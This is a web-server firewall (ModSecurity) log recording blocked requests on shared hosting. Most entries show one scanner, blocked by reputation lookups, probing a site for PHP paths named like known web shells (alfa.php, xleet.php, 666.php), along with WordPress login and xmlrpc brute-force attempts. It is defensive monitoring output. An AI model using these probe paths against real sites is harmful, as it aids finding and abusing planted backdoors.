[Tue May 26 13:55:30.848530 2026] [security2:error] [pid 560287:tid 560466] [client 40.83.92.30:6141] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVY-pmX5s6sDS3wJVcojQAAALM"]
[Tue May 26 13:55:30.919960 2026] [security2:error] [pid 555743:tid 555964] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY-sjqAquC0YaxQjDE3gAAAWU"]
[Tue May 26 13:55:31.073716 2026] [security2:error] [pid 560287:tid 560544] [client 40.83.92.30:6141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/style.php"] [unique_id "ahVY-5mX5s6sDS3wJVcojwAAAPw"]
[Tue May 26 13:55:31.073858 2026] [security2:error] [pid 560287:tid 560544] [client 40.83.92.30:6141] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/style.php"] [unique_id "ahVY-5mX5s6sDS3wJVcojwAAAPw"]
[Tue May 26 13:55:31.525045 2026] [security2:error] [pid 560287:tid 560428] [client 40.83.92.30:6106] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/admin.php"] [unique_id "ahVY-5mX5s6sDS3wJVcolAAAAI8"]
[Tue May 26 13:55:31.525142 2026] [security2:error] [pid 560287:tid 560428] [client 40.83.92.30:6106] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/admin.php"] [unique_id "ahVY-5mX5s6sDS3wJVcolAAAAI8"]
[Tue May 26 13:55:32.043254 2026] [security2:error] [pid 555743:tid 555878] [client 40.83.92.30:6082] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/inputs.php"] [unique_id "ahVY_MjqAquC0YaxQjDE6AAAAQ8"]
[Tue May 26 13:55:32.043446 2026] [security2:error] [pid 555743:tid 555878] [client 40.83.92.30:6082] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/inputs.php"] [unique_id "ahVY_MjqAquC0YaxQjDE6AAAAQ8"]
[Tue May 26 13:55:32.075369 2026] [security2:error] [pid 555743:tid 555817] [remote 216.73.216.240:33135] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2019a-EzhamSuvai_TVKovil.php"] [unique_id "ahVY_MjqAquC0YaxQjDE6QABUUk"]
[Tue May 26 13:55:32.482081 2026] [security2:error] [pid 555743:tid 555948] [client 40.83.92.30:6120] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/file.php"] [unique_id "ahVY_MjqAquC0YaxQjDE8AAAAVU"]
[Tue May 26 13:55:32.482185 2026] [security2:error] [pid 555743:tid 555948] [client 40.83.92.30:6120] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/file.php"] [unique_id "ahVY_MjqAquC0YaxQjDE8AAAAVU"]
[Tue May 26 13:55:32.736296 2026] [security2:error] [pid 560287:tid 560545] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY_JmX5s6sDS3wJVcomgAAAP0"]
[Tue May 26 13:55:32.950419 2026] [security2:error] [pid 555743:tid 555913] [client 40.83.92.30:6093] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wk/index.php"] [unique_id "ahVY_MjqAquC0YaxQjDE-gAAATI"]
[Tue May 26 13:55:32.950529 2026] [security2:error] [pid 555743:tid 555913] [client 40.83.92.30:6093] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wk/index.php"] [unique_id "ahVY_MjqAquC0YaxQjDE-gAAATI"]
[Tue May 26 13:55:33.353150 2026] [security2:error] [pid 560287:tid 560539] [client 202.141.30.10:35356] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVY_ZmX5s6sDS3wJVcooAAAAPc"]
[Tue May 26 13:55:33.353260 2026] [security2:error] [pid 560287:tid 560539] [client 202.141.30.10:35356] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVY_ZmX5s6sDS3wJVcooAAAAPc"]
[Tue May 26 13:55:33.402874 2026] [security2:error] [pid 560287:tid 560496] [client 40.83.92.30:6112] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/about.php"] [unique_id "ahVY_ZmX5s6sDS3wJVcooQAAAM8"]
[Tue May 26 13:55:33.402972 2026] [security2:error] [pid 560287:tid 560496] [client 40.83.92.30:6112] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/about.php"] [unique_id "ahVY_ZmX5s6sDS3wJVcooQAAAM8"]
[Tue May 26 13:55:33.858034 2026] [security2:error] [pid 555743:tid 555937] [client 40.83.92.30:6104] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/1.php"] [unique_id "ahVY_cjqAquC0YaxQjDE_gAAAUo"]
[Tue May 26 13:55:33.858141 2026] [security2:error] [pid 555743:tid 555937] [client 40.83.92.30:6104] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/1.php"] [unique_id "ahVY_cjqAquC0YaxQjDE_gAAAUo"]
[Tue May 26 13:55:33.858223 2026] [security2:error] [pid 555743:tid 555937] [client 40.83.92.30:6104] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/1.php"] [unique_id "ahVY_cjqAquC0YaxQjDE_gAAAUo"]
[Tue May 26 13:55:33.906087 2026] [security2:error] [pid 560287:tid 560547] [client 106.192.248.115:57641] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVY_ZmX5s6sDS3wJVcoowAAAP8"]
[Tue May 26 13:55:33.906281 2026] [security2:error] [pid 560287:tid 560547] [client 106.192.248.115:57641] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVY_ZmX5s6sDS3wJVcoowAAAP8"]
[Tue May 26 13:55:34.238838 2026] [security2:error] [pid 560287:tid 560339] [remote 114.119.139.42:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "digitalgerminate.com"] [uri "/seo-services-chennai/"] [unique_id "ahVY_pmX5s6sDS3wJVcoqQAAojM"], referer: https://digitalgerminate.com/page-sitemap.xml
[Tue May 26 13:55:34.347653 2026] [security2:error] [pid 555743:tid 555991] [client 40.83.92.30:5774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/alfa.php"] [unique_id "ahVY_sjqAquC0YaxQjDFAgAAAYA"]
[Tue May 26 13:55:34.347780 2026] [security2:error] [pid 555743:tid 555991] [client 40.83.92.30:5774] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/alfa.php"] [unique_id "ahVY_sjqAquC0YaxQjDFAgAAAYA"]
[Tue May 26 13:55:34.795767 2026] [security2:error] [pid 560287:tid 560508] [client 40.83.92.30:6100] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/edit.php"] [unique_id "ahVY_pmX5s6sDS3wJVcorAAAANo"]
[Tue May 26 13:55:34.795911 2026] [security2:error] [pid 560287:tid 560508] [client 40.83.92.30:6100] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/edit.php"] [unique_id "ahVY_pmX5s6sDS3wJVcorAAAANo"]
[Tue May 26 13:55:35.252804 2026] [security2:error] [pid 555743:tid 555890] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY_sjqAquC0YaxQjDFCAAAARs"]
[Tue May 26 13:55:35.257717 2026] [security2:error] [pid 560287:tid 560436] [client 40.83.92.30:5770] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/elp.php"] [unique_id "ahVY_5mX5s6sDS3wJVcosAAAAJc"]
[Tue May 26 13:55:35.257852 2026] [security2:error] [pid 560287:tid 560436] [client 40.83.92.30:5770] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/elp.php"] [unique_id "ahVY_5mX5s6sDS3wJVcosAAAAJc"]
[Tue May 26 13:55:35.710571 2026] [security2:error] [pid 560287:tid 560529] [client 40.83.92.30:5768] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/classwithtostring.php"] [unique_id "ahVY_5mX5s6sDS3wJVcotgAAAO8"]
[Tue May 26 13:55:35.710729 2026] [security2:error] [pid 560287:tid 560529] [client 40.83.92.30:5768] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/classwithtostring.php"] [unique_id "ahVY_5mX5s6sDS3wJVcotgAAAO8"]
[Tue May 26 13:55:36.151376 2026] [security2:error] [pid 555743:tid 555894] [client 40.83.92.30:5790] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/666.php"] [unique_id "ahVZAMjqAquC0YaxQjDFFQAAAR8"]
[Tue May 26 13:55:36.151479 2026] [security2:error] [pid 555743:tid 555894] [client 40.83.92.30:5790] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/666.php"] [unique_id "ahVZAMjqAquC0YaxQjDFFQAAAR8"]
[Tue May 26 13:55:36.586474 2026] [security2:error] [pid 555743:tid 555994] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZAMjqAquC0YaxQjDFGgAAAYM"]
[Tue May 26 13:55:36.599199 2026] [security2:error] [pid 555743:tid 555879] [client 40.83.92.30:5771] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVZAMjqAquC0YaxQjDFHwAAARA"]
[Tue May 26 13:55:36.820972 2026] [security2:error] [pid 555743:tid 555917] [client 40.83.92.30:5771] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/ws54.php"] [unique_id "ahVZAMjqAquC0YaxQjDFKQAAATY"]
[Tue May 26 13:55:36.821096 2026] [security2:error] [pid 555743:tid 555917] [client 40.83.92.30:5771] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/ws54.php"] [unique_id "ahVZAMjqAquC0YaxQjDFKQAAATY"]
[Tue May 26 13:55:36.989947 2026] [security2:error] [pid 555743:tid 555836] [remote 103.82.194.131:40998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.194.82.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVZAMjqAquC0YaxQjDFKgABJlw"]
[Tue May 26 13:55:37.278045 2026] [security2:error] [pid 555743:tid 555944] [client 40.83.92.30:6134] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/deepseek_d.php"] [unique_id "ahVZAcjqAquC0YaxQjDFLwAAAVE"]
[Tue May 26 13:55:37.278155 2026] [security2:error] [pid 555743:tid 555944] [client 40.83.92.30:6134] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/deepseek_d.php"] [unique_id "ahVZAcjqAquC0YaxQjDFLwAAAVE"]
[Tue May 26 13:55:37.366506 2026] [security2:error] [pid 555743:tid 555891] [client 162.244.146.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVZAMjqAquC0YaxQjDFFAAAARw"], referer: https://www.anujtradingco.com/
[Tue May 26 13:55:37.763429 2026] [security2:error] [pid 560287:tid 560458] [client 40.83.92.30:6098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/nw.php"] [unique_id "ahVZAZmX5s6sDS3wJVcovwAAAKs"]
[Tue May 26 13:55:37.763555 2026] [security2:error] [pid 560287:tid 560458] [client 40.83.92.30:6098] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/nw.php"] [unique_id "ahVZAZmX5s6sDS3wJVcovwAAAKs"]
[Tue May 26 13:55:37.957683 2026] [security2:error] [pid 555743:tid 555997] [client 129.222.147.134:28765] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZAcjqAquC0YaxQjDFNwAAAYY"]
[Tue May 26 13:55:37.974020 2026] [security2:error] [pid 555743:tid 555997] [client 129.222.147.134:28765] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZAcjqAquC0YaxQjDFNwAAAYY"]
[Tue May 26 13:55:38.208489 2026] [security2:error] [pid 555743:tid 555874] [client 40.83.92.30:6085] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/xleet.php"] [unique_id "ahVZAsjqAquC0YaxQjDFPQAAAQs"]
[Tue May 26 13:55:38.208615 2026] [security2:error] [pid 555743:tid 555874] [client 40.83.92.30:6085] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/xleet.php"] [unique_id "ahVZAsjqAquC0YaxQjDFPQAAAQs"]
[Tue May 26 13:55:38.469357 2026] [security2:error] [pid 560287:tid 560445] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZApmX5s6sDS3wJVcowwAAAJ8"]
[Tue May 26 13:55:38.561824 2026] [security2:error] [pid 560287:tid 560552] [client 162.244.146.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVZApmX5s6sDS3wJVcoyAAAAQQ"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460809&moderation-hash=73b0cbe0ac89cadd9288c857cd3e5de5
[Tue May 26 13:55:38.751484 2026] [security2:error] [pid 555743:tid 555949] [client 40.83.92.30:5784] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp.php"] [unique_id "ahVZAsjqAquC0YaxQjDFRwAAAVY"]
[Tue May 26 13:55:38.751613 2026] [security2:error] [pid 555743:tid 555949] [client 40.83.92.30:5784] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp.php"] [unique_id "ahVZAsjqAquC0YaxQjDFRwAAAVY"]
[Tue May 26 13:55:39.207809 2026] [security2:error] [pid 555743:tid 555939] [client 40.83.92.30:6132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/155.php"] [unique_id "ahVZA8jqAquC0YaxQjDFUwAAAUw"]
[Tue May 26 13:55:39.207949 2026] [security2:error] [pid 555743:tid 555939] [client 40.83.92.30:6132] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/155.php"] [unique_id "ahVZA8jqAquC0YaxQjDFUwAAAUw"]
[Tue May 26 13:55:39.712344 2026] [security2:error] [pid 560287:tid 560517] [client 40.83.92.30:6084] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/96i.php"] [unique_id "ahVZA5mX5s6sDS3wJVco1QAAAOM"]
[Tue May 26 13:55:39.712460 2026] [security2:error] [pid 560287:tid 560517] [client 40.83.92.30:6084] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/96i.php"] [unique_id "ahVZA5mX5s6sDS3wJVco1QAAAOM"]
[Tue May 26 13:55:40.042754 2026] [fcgid:warn] [pid 560287:tid 560477] (70014)End of file found: [client 66.132.172.187:14208] mod_fcgid: can't get data from http client
[Tue May 26 13:55:40.199085 2026] [security2:error] [pid 560287:tid 560478] [client 40.83.92.30:5778] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/as.php"] [unique_id "ahVZBJmX5s6sDS3wJVco3wAAAL4"]
[Tue May 26 13:55:40.199231 2026] [security2:error] [pid 560287:tid 560478] [client 40.83.92.30:5778] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/as.php"] [unique_id "ahVZBJmX5s6sDS3wJVco3wAAAL4"]
[Tue May 26 13:55:40.670994 2026] [security2:error] [pid 560287:tid 560447] [client 40.83.92.30:5796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/php8.php"] [unique_id "ahVZBJmX5s6sDS3wJVco5QAAAKE"]
[Tue May 26 13:55:40.671099 2026] [security2:error] [pid 560287:tid 560447] [client 40.83.92.30:5796] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/php8.php"] [unique_id "ahVZBJmX5s6sDS3wJVco5QAAAKE"]
